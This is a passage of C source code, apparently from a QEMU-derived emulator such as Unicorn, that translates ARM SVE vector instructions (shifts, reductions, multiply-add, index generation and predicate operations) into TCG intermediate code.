gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_vpz_ool(s, a, fns[a->esz]); \ } DO_VPZ(ORV, orv) DO_VPZ(ANDV, andv) DO_VPZ(EORV, eorv) DO_VPZ(UADDV, uaddv) DO_VPZ(SMAXV, smaxv) DO_VPZ(UMAXV, umaxv) DO_VPZ(SMINV, sminv) DO_VPZ(UMINV, uminv) static bool trans_SADDV(DisasContext *s, arg_rpr_esz *a) { static gen_helper_gvec_reduc * const fns[4] = { gen_helper_sve_saddv_b, gen_helper_sve_saddv_h, gen_helper_sve_saddv_s, NULL }; return do_vpz_ool(s, a, fns[a->esz]); } #undef DO_VPZ /* *** SVE Shift by Immediate - Predicated Group */ /* Store zero into every active element of Zd. We will use this for two * and three-operand predicated instructions for which logic dictates a * zero result. */ static bool do_clr_zp(DisasContext *s, int rd, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { gen_helper_sve_clr_b, gen_helper_sve_clr_h, gen_helper_sve_clr_s, gen_helper_sve_clr_d, }; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, rd), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } return true; } /* Copy Zn into Zd, storing zeros into inactive elements. */ static void do_movz_zpz(DisasContext *s, int rd, int rn, int pg, int esz) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_movz_b, gen_helper_sve_movz_h, gen_helper_sve_movz_s, gen_helper_sve_movz_d, }; unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, rd), vec_full_reg_offset(s, rn), pred_full_reg_offset(s, pg), vsz, vsz, 0, fns[esz]); } static bool do_zpzi_ool(DisasContext *s, arg_rpri_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), pred_full_reg_offset(s, a->pg), vsz, vsz, a->imm, fn); } return true; } static bool trans_ASR_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_asr_zpzi_b, gen_helper_sve_asr_zpzi_h, gen_helper_sve_asr_zpzi_s, gen_helper_sve_asr_zpzi_d, }; if (a->esz < 0) { /* Invalid tsz encoding -- see tszimm_esz. */ return false; } /* Shift by element size is architecturally valid. For arithmetic right-shift, it's the same as by one less. */ a->imm = MIN(a->imm, (8 << a->esz) - 1); return do_zpzi_ool(s, a, fns[a->esz]); } static bool trans_LSR_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_lsr_zpzi_b, gen_helper_sve_lsr_zpzi_h, gen_helper_sve_lsr_zpzi_s, gen_helper_sve_lsr_zpzi_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For logical shifts, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } static bool trans_LSL_zpzi(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_lsl_zpzi_b, gen_helper_sve_lsl_zpzi_h, gen_helper_sve_lsl_zpzi_s, gen_helper_sve_lsl_zpzi_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For logical shifts, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } static bool trans_ASRD(DisasContext *s, arg_rpri_esz *a) { static gen_helper_gvec_3 * const fns[4] = { gen_helper_sve_asrd_b, gen_helper_sve_asrd_h, gen_helper_sve_asrd_s, gen_helper_sve_asrd_d, }; if (a->esz < 0) { return false; } /* Shift by element size is architecturally valid. For arithmetic right shift for division, it is a zeroing operation. */ if (a->imm >= (8 << a->esz)) { return do_clr_zp(s, a->rd, a->pg, a->esz); } else { return do_zpzi_ool(s, a, fns[a->esz]); } } /* *** SVE Bitwise Shift - Predicated Group */ #define DO_ZPZW(NAME, name) \ static bool trans_##NAME##_zpzw(DisasContext *s, arg_rprr_esz *a) \ { \ static gen_helper_gvec_4 * const fns[3] = { \ gen_helper_sve_##name##_zpzw_b, gen_helper_sve_##name##_zpzw_h, \ gen_helper_sve_##name##_zpzw_s, \ }; \ if (a->esz < 0 || a->esz >= 3) { \ return false; \ } \ return do_zpzz_ool(s, a, fns[a->esz]); \ } DO_ZPZW(ASR, asr) DO_ZPZW(LSR, lsr) DO_ZPZW(LSL, lsl) #undef DO_ZPZW /* *** SVE Bitwise Shift - Unpredicated Group */ static bool do_shift_imm(DisasContext *s, arg_rri_esz *a, bool asr, void (*gvec_fn)(TCGContext *, unsigned, uint32_t, uint32_t, int64_t, uint32_t, uint32_t)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (a->esz < 0) { /* Invalid tsz encoding -- see tszimm_esz. */ return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); /* Shift by element size is architecturally valid. For arithmetic right-shift, it's the same as by one less. Otherwise it is a zeroing operation. */ if (a->imm >= 8 << a->esz) { if (asr) { a->imm = (8 << a->esz) - 1; } else { do_dupi_z(s, a->rd, 0); return true; } } gvec_fn(tcg_ctx, a->esz, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), a->imm, vsz, vsz); } return true; } static bool trans_ASR_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, true, tcg_gen_gvec_sari); } static bool trans_LSR_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, false, tcg_gen_gvec_shri); } static bool trans_LSL_zzi(DisasContext *s, arg_rri_esz *a) { return do_shift_imm(s, a, false, tcg_gen_gvec_shli); } static bool do_zzw_ool(DisasContext *s, arg_rrr_esz *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (fn == NULL) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fn); } return true; } #define DO_ZZW(NAME, name) \ static bool trans_##NAME##_zzw(DisasContext *s, arg_rrr_esz *a) \ { \ static gen_helper_gvec_3 * const fns[4] = { \ gen_helper_sve_##name##_zzw_b, gen_helper_sve_##name##_zzw_h, \ gen_helper_sve_##name##_zzw_s, NULL \ }; \ return do_zzw_ool(s, a, fns[a->esz]); \ } DO_ZZW(ASR, asr) DO_ZZW(LSR, lsr) DO_ZZW(LSL, lsl) #undef DO_ZZW /* *** SVE Integer Multiply-Add Group */ static bool do_zpzzz_ool(DisasContext *s, arg_rprrr_esz *a, gen_helper_gvec_5 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_5_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->ra), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), pred_full_reg_offset(s, a->pg), vsz, vsz, 0, fn); } return true; } #define DO_ZPZZZ(NAME, name) \ static bool trans_##NAME(DisasContext *s, arg_rprrr_esz *a) \ { \ static gen_helper_gvec_5 * const fns[4] = { \ gen_helper_sve_##name##_b, gen_helper_sve_##name##_h, \ gen_helper_sve_##name##_s, gen_helper_sve_##name##_d, \ }; \ return do_zpzzz_ool(s, a, fns[a->esz]); \ } DO_ZPZZZ(MLA, mla) DO_ZPZZZ(MLS, mls) #undef DO_ZPZZZ /* *** SVE Index Generation Group */ static void do_index(DisasContext *s, int esz, int rd, TCGv_i64 start, TCGv_i64 incr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned vsz = vec_full_reg_size(s); TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(vsz, vsz, 0)); TCGv_ptr t_zd = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_zd, tcg_ctx->cpu_env, vec_full_reg_offset(s, rd)); if (esz == 3) { gen_helper_sve_index_d(tcg_ctx, t_zd, start, incr, desc); } else { typedef void index_fn(TCGContext *, TCGv_ptr, TCGv_i32, TCGv_i32, TCGv_i32); static index_fn * const fns[3] = { gen_helper_sve_index_b, gen_helper_sve_index_h, gen_helper_sve_index_s, }; TCGv_i32 s32 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 i32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, s32, start); tcg_gen_extrl_i64_i32(tcg_ctx, i32, incr); fns[esz](tcg_ctx, t_zd, s32, i32, desc); tcg_temp_free_i32(tcg_ctx, s32); tcg_temp_free_i32(tcg_ctx, i32); } tcg_temp_free_ptr(tcg_ctx, t_zd); tcg_temp_free_i32(tcg_ctx, desc); } static bool trans_INDEX_ii(DisasContext *s, arg_INDEX_ii *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = tcg_const_i64(tcg_ctx, a->imm1); TCGv_i64 incr = tcg_const_i64(tcg_ctx, a->imm2); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, start); tcg_temp_free_i64(tcg_ctx, incr); } return true; } static bool trans_INDEX_ir(DisasContext *s, arg_INDEX_ir *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = tcg_const_i64(tcg_ctx, a->imm); TCGv_i64 incr = cpu_reg(s, a->rm); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, start); } return true; } static bool trans_INDEX_ri(DisasContext *s, arg_INDEX_ri *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 start = cpu_reg(s, a->rn); TCGv_i64 incr = tcg_const_i64(tcg_ctx, a->imm); do_index(s, a->esz, a->rd, start, incr); tcg_temp_free_i64(tcg_ctx, incr); } return true; } static bool trans_INDEX_rr(DisasContext *s, arg_INDEX_rr *a) { if (sve_access_check(s)) { TCGv_i64 start = cpu_reg(s, a->rn); TCGv_i64 incr = cpu_reg(s, a->rm); do_index(s, a->esz, a->rd, start, incr); } return true; } /* *** SVE Stack Allocation Group */ static bool trans_ADDVL(DisasContext *s, arg_ADDVL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 rd = cpu_reg_sp(s, a->rd); TCGv_i64 rn = cpu_reg_sp(s, a->rn); tcg_gen_addi_i64(tcg_ctx, rd, rn, a->imm * vec_full_reg_size(s)); } return true; } static bool trans_ADDPL(DisasContext *s, arg_ADDPL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 rd = cpu_reg_sp(s, a->rd); TCGv_i64 rn = cpu_reg_sp(s, a->rn); tcg_gen_addi_i64(tcg_ctx, rd, rn, a->imm * pred_full_reg_size(s)); } return true; } static bool trans_RDVL(DisasContext *s, arg_RDVL *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { TCGv_i64 reg = cpu_reg(s, a->rd); tcg_gen_movi_i64(tcg_ctx, reg, a->imm * vec_full_reg_size(s)); } return true; } /* *** SVE Compute Vector Address Group */ static bool do_adr(DisasContext *s, arg_rrri *a, gen_helper_gvec_3 *fn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, a->imm, fn); } return true; } static bool trans_ADR_p32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_p32); } static bool trans_ADR_p64(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_p64); } static bool trans_ADR_s32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_s32); } static bool trans_ADR_u32(DisasContext *s, arg_rrri *a) { return do_adr(s, a, gen_helper_sve_adr_u32); } /* *** SVE Integer Misc - Unpredicated Group */ static bool trans_FEXPA(DisasContext *s, arg_rr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_2 * const fns[4] = { NULL, gen_helper_sve_fexpa_h, gen_helper_sve_fexpa_s, gen_helper_sve_fexpa_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_2_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vsz, vsz, 0, fns[a->esz]); } return true; } static bool trans_FTSSEL(DisasContext *s, arg_rrr_esz *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; static gen_helper_gvec_3 * const fns[4] = { NULL, gen_helper_sve_ftssel_h, gen_helper_sve_ftssel_s, gen_helper_sve_ftssel_d, }; if (a->esz == 0) { return false; } if (sve_access_check(s)) { unsigned vsz = vec_full_reg_size(s); tcg_gen_gvec_3_ool(tcg_ctx, vec_full_reg_offset(s, a->rd), vec_full_reg_offset(s, a->rn), vec_full_reg_offset(s, a->rm), vsz, vsz, 0, fns[a->esz]); } return true; } /* *** SVE Predicate Logical Operations Group */ static bool do_pppp_flags(DisasContext *s, arg_rprr_s *a, const GVecGen4 *gvec_op) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned psz = pred_gvec_reg_size(s); int dofs = pred_full_reg_offset(s, a->rd); int nofs = pred_full_reg_offset(s, a->rn); int mofs = pred_full_reg_offset(s, a->rm); int gofs = pred_full_reg_offset(s, a->pg); if (psz == 8) { /* Do the operation and the flags generation in temps. */ TCGv_i64 pd = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pm = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pg = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, pn, tcg_ctx->cpu_env, nofs); tcg_gen_ld_i64(tcg_ctx, pm, tcg_ctx->cpu_env, mofs); tcg_gen_ld_i64(tcg_ctx, pg, tcg_ctx->cpu_env, gofs); gvec_op->fni8(tcg_ctx, pd, pn, pm, pg); tcg_gen_st_i64(tcg_ctx, pd, tcg_ctx->cpu_env, dofs); do_predtest1(tcg_ctx, pd, pg); tcg_temp_free_i64(tcg_ctx, pd); tcg_temp_free_i64(tcg_ctx, pn); tcg_temp_free_i64(tcg_ctx, pm); tcg_temp_free_i64(tcg_ctx, pg); } else { /* The operation and flags generation is large. The computation * of the flags depends on the original contents of the guarding * predicate. If the destination overwrites the guarding predicate, * then the easiest way to get this right is to save a copy. */ int tofs = gofs; if (a->rd == a->pg) { tofs = offsetof(CPUARMState, vfp.preg_tmp); tcg_gen_gvec_mov(tcg_ctx, 0, tofs, gofs, psz, psz); } tcg_gen_gvec_4(tcg_ctx, dofs, nofs, mofs, gofs, psz, psz, gvec_op); do_predtest(s, dofs, tofs, psz / 8); } return true; } static void gen_and_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_and_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_AND_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_and_pg_i64, .fniv = gen_and_pg_vec, .fno = gen_helper_sve_and_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->rn == a->rm) { if (a->pg == a->rn) { return do_mov_p(s, a->rd, a->rn); } else { return do_vector3_p(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->pg); } } else if (a->pg == a->rn || a->pg == a->rm) { return do_vector3_p(s, tcg_gen_gvec_and, 0, a->rd, a->rn, a->rm); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_bic_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_andc_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_bic_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_andc_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_BIC_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_bic_pg_i64, .fniv = gen_bic_pg_vec, .fno = gen_helper_sve_bic_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->pg == a->rn) { return do_vector3_p(s, tcg_gen_gvec_andc, 0, a->rd, a->rn, a->rm); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_eor_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_xor_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_eor_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_xor_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_EOR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_eor_pg_i64, .fniv = gen_eor_pg_vec, .fno = gen_helper_sve_eor_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_sel_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pn, pn, pg); tcg_gen_andc_i64(tcg_ctx, pm, pm, pg); tcg_gen_or_i64(tcg_ctx, pd, pn, pm); } static void gen_sel_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pn, pn, pg); tcg_gen_andc_vec(tcg_ctx, vece, pm, pm, pg); tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); } static bool trans_SEL_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_sel_pg_i64, .fniv = gen_sel_pg_vec, .fno = gen_helper_sve_sel_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return false; } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_orr_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_or_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_orr_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_ORR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_orr_pg_i64, .fniv = gen_orr_pg_vec, .fno = gen_helper_sve_orr_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else if (a->pg == a->rn && a->rn == a->rm) { return do_mov_p(s, a->rd, a->rn); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_orn_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_orc_i64(tcg_ctx, pd, pn, pm); tcg_gen_and_i64(tcg_ctx, pd, pd, pg); } static void gen_orn_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_orc_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_and_vec(tcg_ctx, vece, pd, pd, pg); } static bool trans_ORN_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_orn_pg_i64, .fniv = gen_orn_pg_vec, .fno = gen_helper_sve_orn_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_nor_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_or_i64(tcg_ctx, pd, pn, pm); tcg_gen_andc_i64(tcg_ctx, pd, pg, pd); } static void gen_nor_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_or_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_andc_vec(tcg_ctx, vece, pd, pg, pd); } static bool trans_NOR_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_nor_pg_i64, .fniv = gen_nor_pg_vec, .fno = gen_helper_sve_nor_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } static void gen_nand_pg_i64(TCGContext *tcg_ctx, TCGv_i64 pd, TCGv_i64 pn, TCGv_i64 pm, TCGv_i64 pg) { tcg_gen_and_i64(tcg_ctx, pd, pn, pm); tcg_gen_andc_i64(tcg_ctx, pd, pg, pd); } static void gen_nand_pg_vec(TCGContext *tcg_ctx, unsigned vece, TCGv_vec pd, TCGv_vec pn, TCGv_vec pm, TCGv_vec pg) { tcg_gen_and_vec(tcg_ctx, vece, pd, pn, pm); tcg_gen_andc_vec(tcg_ctx, vece, pd, pg, pd); } static bool trans_NAND_pppp(DisasContext *s, arg_rprr_s *a) { static const GVecGen4 op = { .fni8 = gen_nand_pg_i64, .fniv = gen_nand_pg_vec, .fno = gen_helper_sve_nand_pppp, .prefer_i64 = TCG_TARGET_REG_BITS == 64, }; if (a->s) { return do_pppp_flags(s, a, &op); } else { return do_vecop4_p(s, &op, a->rd, a->rn, a->rm, a->pg); } } /* *** SVE Predicate Misc Group */ static bool trans_PTEST(DisasContext *s, arg_PTEST *a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (sve_access_check(s)) { int nofs = pred_full_reg_offset(s, a->rn); int gofs = pred_full_reg_offset(s, a->pg); int words = DIV_ROUND_UP(pred_full_reg_size(s), 8); if (words == 1) { TCGv_i64 pn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 pg = tcg_temp_new_i64(tcg_ctx); tcg_gen_ld_i64(tcg_ctx, pn, tcg_ctx->cpu_env, nofs); tcg_gen_ld_i64(tcg_ctx, pg, tcg_ctx->cpu_env, gofs); do_predtest1(tcg_ctx, pn, pg); tcg_temp_free_i64(tcg_ctx, pn); tcg_temp_free_i64(tcg_ctx, pg); } else { do_predtest(s, nofs, gofs, words); } } return true; } /* See the ARM pseudocode DecodePredCount. */ static unsigned decode_pred_count(unsigned fullsz, int pattern, int esz) { unsigned elements = fullsz >> esz; unsigned bound; switch (pattern) { case 0x0: /* POW2 */ return pow2floor(elements); case 0x1: /* VL1 */ case 0x2: /* VL2 */ case 0x3: /* VL3 */ case 0x4: /* VL4 */ case 0x5: /* VL5 */ case 0x6: /* VL6 */ case 0x7: /* VL7 */ case 0x8: /* VL8 */ bound = pattern; break; case 0x9: /* VL16 */ case 0xa: /* VL32 */ case 0xb: /* VL64 */ case 0xc: /* VL128 */ case 0xd: /* VL256 */ bound = 16 << (pattern - 9); break; case 0x1d: /* MUL4 */ return elements - elements % 4; case 0x1e: /* MUL3 */ return elements - elements % 3; case 0x1f: /* ALL */ return elements; default: /* #uimm5 */ return 0; } return elements >= bound ? bound : 0; } /* This handles all of the predicate initialization instructions, * PTRUE, PFALSE, SETFFR. For PFALSE, we will have set PAT == 32 * so that decode_pred_count returns 0. For SETFFR, we will have * set RD == 16 == FFR. */ static bool do_predset(DisasContext *s, int esz, int rd, int pat, bool setflag) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } unsigned fullsz = vec_full_reg_size(s); unsigned ofs = pred_full_reg_offset(s, rd); unsigned numelem, setsz, i; uint64_t word, lastword; TCGv_i64 t; numelem = decode_pred_count(fullsz, pat, esz); /* Determine what we must store into each bit, and how many. */ if (numelem == 0) { lastword = word = 0; setsz = fullsz; } else { setsz = numelem << esz; lastword = word = pred_esz_masks[esz]; if (setsz % 64) { lastword &= MAKE_64BIT_MASK(0, setsz % 64); } } t = tcg_temp_new_i64(tcg_ctx); if (fullsz <= 64) { tcg_gen_movi_i64(tcg_ctx, t, lastword); tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs); goto done; } if (word == lastword) { unsigned maxsz = size_for_gvec(fullsz / 8); unsigned oprsz = size_for_gvec(setsz / 8); if (oprsz * 8 == setsz) { tcg_gen_gvec_dup64i(tcg_ctx, ofs, oprsz, maxsz, word); goto done; } } setsz /= 8; fullsz /= 8; tcg_gen_movi_i64(tcg_ctx, t, word); for (i = 0; i < QEMU_ALIGN_DOWN(setsz, 8); i += 8) { tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); } if (lastword != word) { tcg_gen_movi_i64(tcg_ctx, t, lastword); tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); i += 8; } if (i < fullsz) { tcg_gen_movi_i64(tcg_ctx, t, 0); for (; i < fullsz; i += 8) { tcg_gen_st_i64(tcg_ctx, t, tcg_ctx->cpu_env, ofs + i); } } done: tcg_temp_free_i64(tcg_ctx, t); /* PTRUES */ if (setflag) { tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, -(word != 0)); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_CF, word == 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); tcg_gen_mov_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_NF); } return true; } static bool trans_PTRUE(DisasContext *s, arg_PTRUE *a) { return do_predset(s, a->esz, a->rd, a->pat, a->s); } static bool trans_SETFFR(DisasContext *s, arg_SETFFR *a) { /* Note pat == 31 is #all, to set all elements. */ return do_predset(s, 0, FFR_PRED_NUM, 31, false); } static bool trans_PFALSE(DisasContext *s, arg_PFALSE *a) { /* Note pat == 32 is #unimp, to set no elements. */ return do_predset(s, 0, a->rd, 32, false); } static bool trans_RDFFR_p(DisasContext *s, arg_RDFFR_p *a) { /* The path through do_pppp_flags is complicated enough to want to avoid * duplication. Frob the arguments into the form of a predicated AND. */ arg_rprr_s alt_a = { .rd = a->rd, .pg = a->pg, .s = a->s, .rn = FFR_PRED_NUM, .rm = FFR_PRED_NUM, }; return trans_AND_pppp(s, &alt_a); } static bool trans_RDFFR(DisasContext *s, arg_RDFFR *a) { return do_mov_p(s, a->rd, FFR_PRED_NUM); } static bool trans_WRFFR(DisasContext *s, arg_WRFFR *a) { return do_mov_p(s, FFR_PRED_NUM, a->rn); } static bool do_pfirst_pnext(DisasContext *s, arg_rr_esz *a, void (*gen_fn)(TCGContext *, TCGv_i32, TCGv_ptr, TCGv_ptr, TCGv_i32)) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (!sve_access_check(s)) { return true; } TCGv_ptr t_pd = tcg_temp_new_ptr(tcg_ctx); TCGv_ptr t_pg = tcg_temp_new_ptr(tcg_ctx); TCGv_i32 t; unsigned desc; desc = DIV_ROUND_UP(pred_full_reg_size(s), 8); desc = deposit32(desc, SIMD_DATA_SHIFT, 2, a->esz); tcg_gen_addi_ptr(tcg_ctx, t_pd, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rd)); tcg_gen_addi_ptr(tcg_ctx, t_pg, tcg_ctx->cpu_env, pred_full_reg_offset(s, a->rn)); t = tcg_const_i32(tcg_ctx, desc); gen_fn(tcg_ctx, t, t_pd, t_pg, t); tcg_temp_free_ptr(tcg_ctx, t_pd); tcg_temp_free_ptr(tcg_ctx, t_pg); do_pred_flags(tcg_ctx, t); tcg_temp_free_i32(tcg_ctx, t); return true; } static bool trans_PFIRST(DisasContext 